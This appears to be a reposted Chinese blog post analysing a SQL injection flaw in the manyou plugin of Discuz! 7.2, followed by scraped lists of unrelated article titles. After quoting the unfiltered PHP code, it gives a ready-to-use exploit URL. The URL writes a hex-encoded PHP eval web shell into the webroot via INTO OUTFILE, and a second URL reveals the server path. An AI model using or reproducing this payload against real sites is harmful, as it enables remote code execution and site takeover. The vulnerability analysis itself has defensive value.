在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']);    //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {  
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

/manyou/admincp.php?my_suffix=%0A%0DTOBY57    爆路径

 

转载于:https://blog.51cto.com/linkboy/291613

discuz! 7.2 manyou插件暴路径Get Webshell 0day相关推荐

  1. nodejs安装及npm模块插件安装路径配置

    在学习完js后,我们就要进入nodejs的学习,因此就必须配置nodejs和npm的属性了. 我相信,个别人在安装时会遇到这样那样的问题,看着同学都已装好,难免会焦虑起来.于是就开始上网查找解决方案, ...

  2. Discuz!应用中心安装插件显示数据下载错误(105/102)的解决方法

    Discuz!应用中心安装插件的时候最后提示数据下载错误(105)或数据下载错误(102)的问题,搜索了下看见很多站长反馈这个问题! 出现类似的错误主要原因是服务器和应用中心连接出现问题,可以从以下3 ...

  3. Discuz!应用中心安装插件保存数据下载错误(105/102/103)的解决思路

    Discuz!应用中心安装插件的时候最后提示数据下载错误(105)或数据下载错误(102),数据下载错误(102)的问题 解决办法 打开文件source/admincp/admincp_cloudad ...

  4. Vscode快速入门、 插件安装、插件位置、修改vscode默认引用插件的路径、在命令行总配置code、快捷键

    Vscode快速入门 这里写目录标题 安装 插件安装 Ctrl + Shift + X (插件商店): 插件位置 默认位置 修改默认路径 修改vscode默认引用插件的路径 在命令行总配置code 基 ...

  5. 【Android 插件化】基于插件化的恶意软件的加载策略分析 ( 自定义路径加载插件 | 系统路径加载插件 | 用户同意后加载插件 | 隐藏恶意插件 )

    文章目录 一.自定义路径加载插件 二.系统路径加载插件 三.用户同意后加载插件 四.隐藏恶意插件 一.自定义路径加载插件 插件化应用中 , 宿主应用 加载 插件 APK , 需要获取该插件 APK 文 ...

  6. intellij存放插件的路径(转载)

    自定义Intellij idea配置和插件存放目录: 1.进入到idea的安装目录: 2.找到"idea.properties"文件: 3.修改:"idea.config ...

  7. vite使用vite-aliases插件配置路径别名

    介绍 vite-aliases支持Vite4.x版本. vite-aliases是一款vite社区插件,会自动生成一些import路径别名方面的设置(项目根路径下jsconfig.json可自行配置) ...

  8. Discuz!教程之当插件、门户或自定义页面设置成首页时手机版访问跳转到forum.php?mobile=yes的问题

    最近由于项目需要,将自定义单页设置为网站首页,测试过程中一直发现手机版无法访问,被强制跳转到了forum.php?mobile=yes页面. 仔细查看了一下Discuz!代码: source/clas ...

  9. Discuz蜘蛛统计seo插件-蜘蛛统计插件

    Discuz蜘蛛插件,我们为什么要Discuz装蜘蛛插件,一个合格的SEO人员必须懂得分析网站的蜘蛛情况,Discuz蜘蛛插件可以让我们分析出各大搜索引擎蜘蛛的访问间隔频率,以及最受蜘蛛喜爱的页面,让 ...

最新文章

  1. 作用c语言算圆的周长,C语言入门级代码 输入圆的半径求出圆的周长及面积
  2. python埋点自动化_iOS自动化埋点的实现
  3. 【EXLIBRIS】随笔记 006
  4. mongodump 失败且导致mongo服务挂掉【本质原因,wt文件损坏】
  5. Leo的AR代码学习之create-react-class
  6. 使用Docker-Compose搭建高可用redis哨兵集群
  7. CPU设计学习-流水线
  8. SequoiaDB扩容介绍与最佳实践
  9. js入门·对象属性方法大总结
  10. 如何给页面加上loding_excel打印区域页面设置
  11. 数据挖掘原理与算法 Agnes算法
  12. 用动态规划解小朋友分糖问题
  13. html5微信分享图标和文本设置,科技常识:Html5 实现微信分享及自定义内容的流程...
  14. 次坐标从0开始_全站仪使用方法及坐标计算,详细讲解!建议收藏!
  15. python目录和文件的基本操作_Python常用的文件及文件路径、目录操作方法汇总介绍...
  16. 微信小程序开发(3.选项卡)
  17. run `npm fund` for details
  18. Java实现斗地主发牌及排序功能[小白篇]
  19. Android设置按钮不可点击
  20. PHP文件包含漏洞(利用phpinfo)复现

热门文章

  1. Image Processing --- Gaussian Pyramid Laplacian Pyramid
  2. 瑞丽,边陲的旖旎风情
  3. Python 利用pymupdf将pdf转换为图片并拆分,后通过PIL合并生成一张图片
  4. Python TypeError: object() takes no parameters
  5. Jsp之我遇到过的中文乱码问题和解决方法
  6. Msql自学日志01---基本操作增,删,改,查,建
  7. 自动注入、加载 properties 文件、scope 属性、单例设计模式
  8. Eclipse导入Solr源码Version5.5.3
  9. Linux查看网卡带宽
  10. SQL中不建议使用 where 1=1 的说法,是错误的